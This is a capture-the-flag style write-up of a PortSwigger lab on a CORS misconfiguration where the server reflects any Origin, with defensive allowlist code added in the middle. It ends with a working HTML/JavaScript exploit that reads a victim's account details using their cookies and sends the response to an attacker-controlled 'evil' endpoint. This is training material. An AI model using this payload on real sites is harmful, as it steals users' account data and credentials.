Hello friends,
I'm Rem01x, and I'm currently preparing for the eWPTX exam, so I will be walking through all the PortSwigger labs and making sure to write up all of them.
Let's start now.
Assume that we have this website.

Now, let's log in to our account.

Now, let's check the requests in Burp.

Please notice the CORS header in the response.
Now, let's add the Origin header to the request and see what happens.

As observed, the value of the Origin header is reflected back in the `Access-Control-Allow-Origin` header, which means that the website allows any origin to access its resources.
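For the server side of this finding, here is an added example (not part of the lab or of the original write-up) that puts the reflecting behaviour next to an exact-match allowlist, plus a check that mirrors the Burp observation. The origins, the allowlist and all function names are constructed for illustration, and it assumes the response also sends `Access-Control-Allow-Credentials: true`, which a `withCredentials` request needs before the browser exposes the response.

```javascript
// Constructed allowlist for illustration; replace with the origins you actually trust.
const TRUSTED_ORIGINS = new Set(["https://app.example.com", "https://admin.example.com"]);

// Weak pattern observed above: echo whatever Origin the request carried.
function reflectingCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Hardened pattern: exact match against the allowlist, otherwise send no CORS headers.
function allowlistCorsHeaders(requestOrigin) {
  if (typeof requestOrigin !== "string") return {};
  let parsed;
  try {
    parsed = new URL(requestOrigin);
  } catch {
    return {}; // "null" and other non-URL values end up here
  }
  // Compare the serialized origin, never a prefix, suffix or substring.
  if (parsed.origin !== requestOrigin || !TRUSTED_ORIGINS.has(parsed.origin)) return {};
  return {
    "Access-Control-Allow-Origin": parsed.origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Audit check: would a browser let a page on `origin` read a credentialed response?
function credentialedReadAllowed(origin, headers) {
  return headers["Access-Control-Allow-Origin"] === origin &&
         headers["Access-Control-Allow-Credentials"] === "true";
}

// Constructed probes: one untrusted origin, one look-alike, one trusted origin.
const probes = ["https://untrusted.example", "https://app.example.com.untrusted.example", "https://app.example.com"];
for (const origin of probes) {
  console.log(origin,
    "reflecting:", credentialedReadAllowed(origin, reflectingCorsHeaders(origin)),
    "allowlist:", credentialedReadAllowed(origin, allowlistCorsHeaders(origin)));
}
```

With the allowlist in place, only the trusted origin gets the CORS headers; the untrusted and look-alike origins receive none, so the browser blocks the cross-origin read.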
Now, let's write the exploitation script.
```html
<html>
<body>
<script>
    var xhr = new XMLHttpRequest();
    // Lab instance URL
    var url = "https://0a5800d603ca62168811d97300d200fa.web-security-academy.net";
    xhr.onreadystatechange = function(){
        // Once the response has fully arrived, pass its body on as a query parameter
        if(xhr.readyState == XMLHttpRequest.DONE){
            fetch("evil?ev=" + xhr.responseText)
        }
    }
    xhr.open('GET', url + "/accountDetails", true);
    // Send the victim's session cookies with the cross-origin request
    xhr.withCredentials = true;
    xhr.send()
</script>
</body>
</html>
```

Now, let's go and send the exploit to the victim using the Exploit Server.